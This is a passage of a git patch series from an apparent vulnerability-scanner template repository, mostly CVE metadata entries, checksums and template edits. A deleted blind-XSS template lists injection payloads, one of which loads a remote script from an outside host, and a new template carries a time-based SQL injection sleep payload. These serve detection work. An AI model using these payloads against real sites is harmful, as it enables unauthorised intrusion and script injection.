API.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43472.yaml"} {"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"} {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} @@ -2302,7 +2306,7 @@ {"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"} {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} {"ID":"CVE-2023-48084","Info":{"Name":"Nagios XI \u003c 5.11.3 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-48084.yaml"} -{"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"} +{"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} @@ -2336,10 +2340,12 @@ {"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"} {"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"} {"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6389.yaml"} +{"ID":"CVE-2023-6505","Info":{"Name":"Prime Mover \u003c 1.9.3 - Sensitive Data Exposure","Severity":"high","Description":"Prime Mover plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.2 via directory listing in the 'prime-mover-export-files/1/' folder. This makes it possible for unauthenticated attackers to extract sensitive data including site and configuration information, directories, files, and password hashes.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6505.yaml"} {"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"} {"ID":"CVE-2023-6567","Info":{"Name":"LearnPress \u003c= 4.2.5.7 - SQL Injection","Severity":"high","Description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6567.yaml"} {"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"} {"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"} +{"ID":"CVE-2023-6786","Info":{"Name":"Payment Gateway for Telcell \u003c 2.0.4 - Open Redirect","Severity":"medium","Description":"The plugin does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-6786.yaml"} {"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"} {"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"} {"ID":"CVE-2023-6895","Info":{"Name":"Hikvision IP ping.php - Command Execution","Severity":"critical","Description":"A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"} @@ -2351,6 +2357,7 @@ {"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} {"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"} +{"ID":"CVE-2024-0250","Info":{"Name":"Analytics Insights for Google Analytics 4 \u003c 6.3 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0250.yaml"} {"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"} {"ID":"CVE-2024-0337","Info":{"Name":"Travelpayouts \u003c= 1.1.16 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0337.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} @@ -2380,6 +2387,7 @@ {"ID":"CVE-2024-22927","Info":{"Name":"eyoucms v.1.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-22927.yaml"} {"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} {"ID":"CVE-2024-2340","Info":{"Name":"Avada \u003c 7.11.7 - Information Disclosure","Severity":"medium","Description":"The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-2340.yaml"} +{"ID":"CVE-2024-23692","Info":{"Name":"Rejetto HTTP File Server - Template injection","Severity":"critical","Description":"This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23692.yaml"} {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} {"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} @@ -2422,6 +2430,7 @@ {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} +{"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index a6bfebd6fa..42bcf971ec 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -b850ce0a43b8e25fcc5d4b47a2edd438 +ccfb062d74fe49f673c3566b7bedbb47 From ddb7bac07bee31888803783b7fd9da3fa7932176 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 23:15:20 +0530 Subject: [PATCH 0152/1841] Delete dast/vulnerabilities/xss/blind-xss.yaml --- dast/vulnerabilities/xss/blind-xss.yaml | 64 ------------------------- 1 file changed, 64 deletions(-) delete mode 100644 dast/vulnerabilities/xss/blind-xss.yaml diff --git a/dast/vulnerabilities/xss/blind-xss.yaml b/dast/vulnerabilities/xss/blind-xss.yaml deleted file mode 100644 index f2d6cbc306..0000000000 --- a/dast/vulnerabilities/xss/blind-xss.yaml +++ /dev/null @@ -1,64 +0,0 @@ -id: blind-xss - -info: - name: Blind Cross Site Scripting - author: 0xKayala - severity: high - description: This template will spray blind XSS payloads into URLs. Use 'xss.report', 'bxsshunter.com', 'xsshunter.trufflesecurity.com', 'ez.pe' or 'self-hosted server' to check if the payload fired. - tags: xss,bxss,dast - -variables: - first: "{{rand_int(10000, 99999)}}" - script_payload_1: "" - script_payload_2: "\"><41707" - script_payload_3: "" - script_payload_4: "" - script_payload_5: "" - script_payload_6: "" - script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" - script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2F0xkayala.github.io/xss-poc.js%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E" - script_payload_9: "XX">" - -http: - - method: GET - path: - - "{{BaseURL}}" - - payloads: - blind: - - "{{script_payload_1}}" - - "{{script_payload_2}}" - - "{{script_payload_3}}" - - "{{script_payload_4}}" - - "{{script_payload_5}}" - - "{{script_payload_6}}" - - "{{script_payload_7}}" - - "{{script_payload_8}}" - - "{{script_payload_9}}" - - fuzzing: - - part: query - type: postfix - mode: single - fuzz: - - "{{blind}}" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{script_payload_1}}" - - "{{script_payload_2}}" - - "{{script_payload_3}}" - - "{{script_payload_4}}" - - "{{script_payload_5}}" - - "{{script_payload_6}}" - - "{{script_payload_7}}" - - "{{script_payload_8}}" - - "{{script_payload_9}}" - - type: word - part: header - words: - - "text/html" From f82a70bdda44f237497df7f5802a386862cff80a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 12 Jun 2024 00:08:52 +0530 Subject: [PATCH 0153/1841] Update time-based-sqli.yaml --- dast/vulnerabilities/sqli/time-based-sqli.yaml | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index 3fd64ce568..4256dcd6b7 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -6,13 +6,26 @@ info: severity: critical description: | This Template detects time-based Blind SQL Injection vulnerability - tags: sqli,dast,time + tags: sqli,dast,time-based,blind + +flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" + matchers: + - type: dsl + dsl: + - "duration<=7" + + - raw: + - | + @timeout: 20s + GET / HTTP/1.1 + Host: {{Hostname}} + payloads: injection: - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" From 0d5471c73c07adecf81f6bfadf9cb4241a955e7e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 12 Jun 2024 00:18:12 +0530 Subject: [PATCH 0154/1841] updated matchers --- http/exposed-panels/lorex-panel.yaml | 17 +++++++---------- 1 file changed, 7 insertions(+), 10 deletions(-) diff --git a/http/exposed-panels/lorex-panel.yaml b/http/exposed-panels/lorex-panel.yaml index ad6fb2357e..dbd2c74b79 100644 --- a/http/exposed-panels/lorex-panel.yaml +++ b/http/exposed-panels/lorex-panel.yaml @@ -13,8 +13,8 @@ info: metadata: verified: true max-request: 1 - shodan-query: html:"WEB SERVICE" - tags: panel,login,detect + shodan-query: "Lorex" + tags: panel,login,detect,lorex http: - method: GET @@ -26,11 +26,8 @@ http: matchers-condition: and matchers: - - type: word - part: body - words: - - 'WEB SERVICE' - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains_all(tolower(body), "web service", "lorex")' + - 'contains_any(body, "/LOREX_webplugin", "lorex_msg")' + condition: or From dafc99c373eda03046fb9142e0c130aac27845b6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 11 Jun 2024 22:51:29 +0400 Subject: [PATCH 0155/1841] misc changes --- .../aws/sns/sns-public-subscribe-access.yaml | 8 ++++---- cloud/aws/sns/sns-topic-public-accessible.yaml | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) rename sns-topic-subscribe-public-accessible.yaml => cloud/aws/sns/sns-public-subscribe-access.yaml (81%) diff --git a/sns-topic-subscribe-public-accessible.yaml b/cloud/aws/sns/sns-public-subscribe-access.yaml similarity index 81% rename from sns-topic-subscribe-public-accessible.yaml rename to cloud/aws/sns/sns-public-subscribe-access.yaml index d8162afebf..ae4e00c229 100644 --- a/sns-topic-subscribe-public-accessible.yaml +++ b/cloud/aws/sns/sns-public-subscribe-access.yaml @@ -1,14 +1,14 @@ -id: sns-topic-subscribe-public-access +id: sns-public-subscribe-access info: name: Public Subscription Access of SNS Topics via Policy author: Ritesh_Gohil(#L4stPL4Y3R) - severity: High + severity: high description: | This template checks if Amazon SNS topics are configured to allow public subscription access via topic policies. reference: - https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html - tags: cloud, devops, aws, amazon, sns, aws-cloud-config + tags: cloud,devops,aws,amazon,sns,aws-cloud-config flow: | code(1) @@ -65,4 +65,4 @@ code: - type: dsl dsl: - '"The SNS topic " + topicArn + " allows public subscription via Policy"' -# digest: 4a0a0047304502205fb7f0c9b0626cc145370d50015cadeeda16e73469baaab959fc8c76c120a57b02210096912a33733194302dcee8747a398dd06c425ceac11d7348bd8c08ca4b0184de:f37bf26b30a8e29c9db6a85589544950 \ No newline at end of file +# digest: 4a0a004730450221008a967d8e5c9942beefab71caa02bdc0fd01121f2c88254d8a37296a941f8e02c02200d45a3425f5011f61061b5004635f3ad9407bcd88ae47fcda6afc63e883b432d:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/aws/sns/sns-topic-public-accessible.yaml b/cloud/aws/sns/sns-topic-public-accessible.yaml index 5cc304a527..e5300b517b 100644 --- a/cloud/aws/sns/sns-topic-public-accessible.yaml +++ b/cloud/aws/sns/sns-topic-public-accessible.yaml @@ -60,4 +60,4 @@ code: - type: dsl dsl: - '"The SNS topic " + topicArn + " is publicly accessible via Policy"' -# digest: 4a0a00473045022100a86cbadd9b2cca9f3e2eeb26bef158bf6658165af060938dc49ce7d588c776be0220179263c7d0129712f96ae3284cc2701c0407a1ca739ecf45729d656af36816d0:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 4a0a0047304502200dff8839ea05345d4fbf9399ef0c6b3b5efd891edbfcc049b16f9509cc6147ef022100f333312e0dfe72993ca40c3ad6b5ba91e7237fa0871eb620f2ede5529c5ab328:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file From 01b6465ae752f608d9506b59c1891ade2770e7f1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 19:02:57 +0000 Subject: [PATCH 0156/1841] Auto Generated New Template Addition List [Tue Jun 11 19:02:57 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 9e69654eb4..ecb49f915f 100644 --- a/.new-additions +++ b/.new-additions @@ -1,9 +1,11 @@ +cloud/aws/sns/sns-public-subscribe-access.yaml http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2023/CVE-2023-43472.yaml http/cves/2023/CVE-2023-6505.yaml http/cves/2023/CVE-2023-6786.yaml +http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-23692.yaml http/exposed-panels/oracle-application-server-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml From ac41c89bc240a88e78dd182074e86de600540991 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 19:03:03 +0000 Subject: [PATCH 0157/1841] Auto Generated Templates Checksum [Tue Jun 11 19:03:03 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4b3b53731a..2350a69f16 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -88,7 +88,8 @@ cloud/aws/s3/s3-public-write-acp.yaml:3cb356eb0d36ac3d681edec2d7c7635adadb485e cloud/aws/s3/s3-public-write.yaml:4f322fd5432d6efb07e0e01f174c9c59f24bde7c cloud/aws/s3/s3-server-side-encryption.yaml:6148a203262dc65bf4f7de822e65f255e6c56f79 cloud/aws/s3/s3-versioning.yaml:c3c6bd9bb375fc3f91a9566f63d8e443388e2f40 -cloud/aws/sns/sns-topic-public-accessible.yaml:b9837c9dc66bf792cb12a535c0490ba483e29663 +cloud/aws/sns/sns-public-subscribe-access.yaml:cb5887c447b05ef4ab7c398963229371f9689be4 +cloud/aws/sns/sns-topic-public-accessible.yaml:d17d97c8c3aee214711bedd4d32268a7096c559b cloud/aws/vpc/nacl-open-inbound.yaml:364184b88817ca98ecccc4661c798e3f9929df49 cloud/aws/vpc/nacl-outbound-restrict.yaml:5c11a1c330cab97bd0f2cf1fcbe38db5a242f980 cloud/aws/vpc/nat-gateway-usage.yaml:4f8877ca0d721da30e72e5364afa29adb304a84d @@ -188,8 +189,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:7e57aa58a2dde22d0e60ebdfb0a10c00a2310cec -cves.json-checksum.txt:8866cb507164321fe99b89f58ef28da52a9cb13b +cves.json:15e3d2b258890ea3f6670c981a4b0703d98a1b98 +cves.json-checksum.txt:eb4c7db68b582f0cd4ecf6cdb67ff52c6532e739 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3172,7 +3173,7 @@ http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d 